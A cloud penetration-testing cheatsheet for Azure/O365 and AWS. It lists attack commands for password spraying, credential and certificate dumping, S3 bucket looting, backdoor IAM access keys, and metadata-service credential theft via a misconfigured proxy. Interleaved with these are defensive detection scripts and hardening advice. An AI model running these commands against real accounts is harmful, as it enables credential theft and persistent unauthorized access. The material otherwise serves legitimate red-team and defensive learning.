# Cloud Pen-testing Part 3
## Microsoft Azure & O365 CLI Tool Cheatsheet (Part 3)
### Other Azure & O365 Tools

#### Look for open storage blobs
```powershell
Invoke-EnumerateAzureBlobs -Base $BaseName
```

#### Export SSL/TLS certs
```powershell
Get-AzPasswords -ExportCerts Y
```

#### Azure Container Registry dump
```powershell
Get-AzPasswords
Get-AzACR
```

#### PowerZure
Azure security assessment tool
https://github.com/hausec/PowerZure

#### ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools

#### Stormspotter
Red team tool for graphing Azure and Azure AD objects
https://github.com/Azure/Stormspotter

#### MSOLSpray
Tool to password spray Azure/O365
```powershell
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
```
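From the blue-team side, the spray above leaves a very recognisable shape in the tenant's sign-in logs: one source address failing against many distinct accounts in a short window. The detector below is an added example for this cheatsheet, not code from the page or from the MSOLSpray project. The sign-in events are constructed; the field names (`userPrincipalName`, `ipAddress`, `status.errorCode`) follow the Azure AD sign-in log schema, and 50126 is the "invalid username or password" code a wrong guess produces.

```python
"""Password-spray detection over Azure AD sign-in logs.

Added example for this cheatsheet; it is not code from the page or from the
MSOLSpray project. A spray is one password tried against many accounts, so
the detector looks for a single source IP failing against many distinct
users inside a short window. The events below are constructed; the field
names follow the Azure AD sign-in log schema and 50126 is the
"invalid username or password" result code.
"""
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_CREDENTIALS = 50126


def _event(ts, upn, ip, code):
    return {"createdDateTime": ts, "userPrincipalName": upn,
            "ipAddress": ip, "status": {"errorCode": code}}


# Constructed: one IP walks a user list with a single password and gets a hit
# on the seventh account; a second IP is just one user mistyping three times.
SAMPLE_SIGNINS = [
    _event("2020-04-01T09:00:00Z", "alice@example.com", "203.0.113.10", INVALID_CREDENTIALS),
    _event("2020-04-01T09:00:30Z", "bob@example.com",   "203.0.113.10", INVALID_CREDENTIALS),
    _event("2020-04-01T09:01:00Z", "carol@example.com", "203.0.113.10", INVALID_CREDENTIALS),
    _event("2020-04-01T09:01:30Z", "dave@example.com",  "203.0.113.10", INVALID_CREDENTIALS),
    _event("2020-04-01T09:02:00Z", "erin@example.com",  "203.0.113.10", INVALID_CREDENTIALS),
    _event("2020-04-01T09:02:30Z", "frank@example.com", "203.0.113.10", INVALID_CREDENTIALS),
    _event("2020-04-01T09:03:00Z", "grace@example.com", "203.0.113.10", 0),
    _event("2020-04-01T10:00:00Z", "alice@example.com", "198.51.100.7", INVALID_CREDENTIALS),
    _event("2020-04-01T10:00:10Z", "alice@example.com", "198.51.100.7", INVALID_CREDENTIALS),
    _event("2020-04-01T10:00:20Z", "alice@example.com", "198.51.100.7", INVALID_CREDENTIALS),
]


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {ip: {"targeted": [...], "succeeded": [...]}} for every source IP
    that failed against at least min_users distinct accounts within any
    window-sized span. "succeeded" lists accounts that IP signed into
    successfully, i.e. the guesses that worked and need a password reset."""
    failures = defaultdict(list)
    successes = defaultdict(set)
    for e in events:
        code = e.get("status", {}).get("errorCode")
        ip, upn = e["ipAddress"], e["userPrincipalName"].lower()
        if code == INVALID_CREDENTIALS:
            failures[ip].append((_parse_ts(e["createdDateTime"]), upn))
        elif code == 0:
            successes[ip].add(upn)

    hits = {}
    for ip, attempts in failures.items():
        attempts.sort()
        lo = 0
        for hi in range(len(attempts)):  # sliding window over time-ordered failures
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            if len({u for _, u in attempts[lo:hi + 1]}) >= min_users:
                hits[ip] = {"targeted": sorted({u for _, u in attempts}),
                            "succeeded": sorted(successes.get(ip, ()))}
                break
    return hits


if __name__ == "__main__":
    for ip, detail in detect_spray(SAMPLE_SIGNINS).items():
        print(ip, detail)
```

In a real tenant the events come from the sign-in log export (the `SigninLogs` table in Log Analytics, or the Microsoft Graph sign-in API). Grouping by source IP is the simplest key; a spray spread over many addresses needs the same count keyed on user agent or ASN, or a tenant-wide count of distinct users per failure code. The accounts in `succeeded` are the ones to reset first, and MFA plus Smart Lockout and blocking legacy authentication are what keep a spray from paying off in the first place.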
## Amazon Web Services (AWS) CLI Tool Cheatsheet

### Authentication
```shell
# Set AWS programmatic keys for authentication (add --profile <name> to create a separate named profile)
aws configure
```
### Open S3 bucket enumeration

#### List the contents of an S3 bucket
```shell
aws s3 ls s3://<bucketname>/
```

#### Download contents of a bucket
```shell
aws s3 sync s3://<bucketname> s3-files-dir
```
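The defender's counterpart to listing an open bucket is finding the grant that made it open before anyone else does. The checker below is an added example for this cheatsheet, not code from the page or from AWS: it reads a bucket policy document (what `aws s3api get-bucket-policy` returns) and flags Allow statements whose Principal is `"*"` or `{"AWS": "*"}` with no Condition. Both policies are constructed, and `123456789012` is the AWS documentation placeholder account id.

```python
"""Static public-access check for an S3 bucket policy.

Added example for this cheatsheet; it is not code from the page or from AWS.
It inspects a policy document the way a reviewer would: an Allow statement
whose Principal is "*" (or {"AWS": "*"}) and which carries no Condition
grants its actions to anyone on the internet. The policies below are
constructed; the account id is the AWS documentation placeholder.
"""
import json


def _as_list(value):
    """IAM JSON allows a scalar wherever a list is expected; normalise."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} (possibly inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def public_statements(policy):
    """Return [(Sid, [actions])] for every statement that grants to anyone
    without a Condition. Conditional wildcard statements are skipped on
    purpose: they may still be too broad, but judging the condition needs
    a human reader, so they are left for manual review."""
    doc = json.loads(policy) if isinstance(policy, str) else policy
    found = []
    for stmt in _as_list(doc.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue
        found.append((stmt.get("Sid", "<no Sid>"), sorted(_as_list(stmt.get("Action")))))
    return found


# Constructed: a bucket readable by the whole internet, plus a wildcard
# statement that is scoped to a VPC endpoint by a condition.
PUBLIC_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "VpcOnlyList", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-bucket",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
    ],
})

# Constructed: the same access restricted to one application role.
PRIVATE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AppRead", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-role"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]},
    ],
})

if __name__ == "__main__":
    for name, policy in (("public", PUBLIC_POLICY), ("private", PRIVATE_POLICY)):
        print(name, public_statements(policy))
```

A bucket policy is only one of three ways a bucket ends up public: bucket ACLs (`aws s3api get-bucket-acl`) are a second, and account- or bucket-level Block Public Access (`aws s3api get-public-access-block --bucket <bucket>`) can override both. AWS's own verdict is `PolicyStatus.IsPublic` from `aws s3api get-bucket-policy-status --bucket <bucket>`; the static check above is for reviewing policies in source control before they are applied.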
### Account Information

#### Get basic account info
```shell
aws sts get-caller-identity
```

#### List IAM users
```shell
aws iam list-users
```

#### List IAM roles
```shell
aws iam list-roles
```

#### List S3 buckets accessible to an account
```shell
aws s3 ls
```

### Virtual Machines

#### List EC2 instances
```shell
aws ec2 describe-instances
```

### WebApps & SQL

#### List WebApps
```shell
aws deploy list-applications
```
#### List AWS RDS (SQL)
```shell
aws rds describe-db-instances --region <region name>
```
### Serverless

#### List Lambda Functions
```shell
aws lambda list-functions --region <region>
```

#### Look at environment variables set for secrets and analyze code
```shell
aws lambda get-function --function-name <lambda function>
```

### Networking

#### List EC2 subnets
```shell
aws ec2 describe-subnets
```

#### List EC2 network interfaces
```shell
aws ec2 describe-network-interfaces
```

#### List DirectConnect (VPN) connections
```shell
aws directconnect describe-connections
```

### Backdoors

#### List access keys for a user
```shell
aws iam list-access-keys --user-name <username>
```

#### Backdoor account with a second set of access keys
```shell
aws iam create-access-key --user-name <username>
```
### Instance Metadata Service

#### Instance Metadata Service URL
```shell
http://169.254.169.254/latest/meta-data
```

#### Additional IAM credentials are possibly available here
```shell
http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>
```

#### It can potentially be reached from outside if a proxy service (like Nginx) hosted in AWS is misconfigured to forward requests to it
```shell
curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo
```

#### IMDS Version 2 has some protections (every request must carry a session token that is first obtained with a PUT request), but these commands can be used to access it
```shell
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```
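Both the Backdoors section and the Instance Metadata Service section above describe actions that CloudTrail records, so they are detectable after the fact. The script below is an added example for this cheatsheet, not code from the page or from AWS. It reads CloudTrail records in their JSON shape and flags two things: `CreateAccessKey` calls that add a second key to a user or create a key for a principal other than the caller, and API calls made with instance-role credentials that IMDSv1 delivered, which CloudTrail marks with `userIdentity.sessionContext.ec2RoleDelivery == "1.0"`. The records, the account id (`123456789012`), the instance id and the IP addresses are all constructed.

```python
"""CloudTrail checks for the Backdoors and Instance Metadata Service sections.

Added example, not code from the page or from AWS. Records are constructed
in CloudTrail's JSON shape; account id, instance id and IPs are placeholders.
"""
import json

SAMPLE_TRAIL = json.dumps({"Records": [
    {   # alice creates her own first key: ordinary
        "eventTime": "2020-04-01T09:00:00Z", "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "alice",
                         "arn": "arn:aws:iam::123456789012:user/alice"},
        "requestParameters": {"userName": "alice"},
    },
    {   # alice creates a key for bob, who already has one: the backdoor pattern
        "eventTime": "2020-04-01T09:05:00Z", "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "userName": "alice",
                         "arn": "arn:aws:iam::123456789012:user/alice"},
        "requestParameters": {"userName": "bob"},
    },
    {   # role credentials obtained via IMDSv1 and used from an address that is not the instance
        "eventTime": "2020-04-01T09:10:00Z", "eventSource": "sts.amazonaws.com",
        "eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::123456789012:assumed-role/WebRole/i-0abc123",
                         "sessionContext": {"ec2RoleDelivery": "1.0"}},
    },
    {   # the same role used normally, credentials delivered by IMDSv2
        "eventTime": "2020-04-01T09:11:00Z", "eventSource": "ec2.amazonaws.com",
        "eventName": "DescribeInstances", "sourceIPAddress": "10.0.1.25",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::123456789012:assumed-role/WebRole/i-0abc123",
                         "sessionContext": {"ec2RoleDelivery": "2.0"}},
    },
]})


def load_records(trail_json):
    """CloudTrail log files wrap events in a top-level "Records" list."""
    return json.loads(trail_json)["Records"]


def find_backdoor_keys(records, active_keys_before):
    """active_keys_before maps userName -> number of active keys the user had
    before these events (as reported by `aws iam list-access-keys`). Returns
    one finding per suspicious CreateAccessKey with the reasons it was flagged."""
    findings = []
    for r in records:
        if r.get("eventSource") != "iam.amazonaws.com" or r.get("eventName") != "CreateAccessKey":
            continue
        caller = r.get("userIdentity", {}).get("userName")
        # IAM defaults the target to the caller when userName is omitted.
        target = (r.get("requestParameters") or {}).get("userName") or caller
        reasons = []
        if target != caller:
            reasons.append("key created for a different principal")
        if active_keys_before.get(target, 0) >= 1:
            reasons.append("user already had an active key")
        if reasons:
            findings.append({"time": r["eventTime"], "by": caller, "for": target,
                             "ip": r.get("sourceIPAddress"), "reasons": reasons})
    return findings


def find_imdsv1_sessions(records):
    """Return (role session ARN, source IP, event) for calls whose credentials
    came from IMDSv1. A source IP that is not the instance's own address is
    the strongest sign the credentials were carried off the box."""
    hits = []
    for r in records:
        ctx = r.get("userIdentity", {}).get("sessionContext", {})
        if ctx.get("ec2RoleDelivery") == "1.0":
            hits.append((r["userIdentity"]["arn"], r.get("sourceIPAddress"), r["eventName"]))
    return hits


if __name__ == "__main__":
    recs = load_records(SAMPLE_TRAIL)
    print(find_backdoor_keys(recs, {"alice": 0, "bob": 1}))
    print(find_imdsv1_sessions(recs))
```

The instance-side fix for the proxy path is to require IMDSv2: `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`. With tokens required, the unauthenticated GET that a forwarding proxy relays returns 401, and with the hop limit at 1 the PUT response that carries a token cannot travel past the instance itself, so the token step cannot be bounced through a proxy or a container NAT either. Once that is in place, any remaining `ec2RoleDelivery: "1.0"` event is a finding in its own right; GuardDuty's `UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS` covers the off-box use case, and a second access key on a user who never needed one is worth the same scrutiny as a new user.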